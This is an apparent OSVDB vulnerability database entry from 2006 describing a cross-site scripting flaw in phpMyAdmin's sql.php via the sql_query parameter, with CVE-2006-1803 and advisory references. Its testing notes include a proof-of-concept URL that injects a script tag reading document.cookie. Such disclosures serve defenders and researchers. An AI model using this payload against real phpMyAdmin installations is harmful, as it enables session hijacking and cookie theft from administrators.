phpMyAdmin sql.php sql_query Variable XSS

2006-04-12T06:02:39
ID OSVDB:24641
Type osvdb
Reporter OSVDB
Modified 2006-04-12T06:02:39

Description

Manual Testing Notes

/phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=[XSS]

/phpmyadmin/sql.php?lang=de-utf- 8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/ script%3E'%60

References:

Vendor URL: http://www.phpmyadmin.net/ Vendor Specific Advisory URL Secunia Advisory ID:19897 Secunia Advisory ID:19659 Related OSVDB ID: 24642 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0259.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0279.html FrSIRT Advisory: ADV-2006-1372 CVE-2006-1803 Bugtraq ID: 17487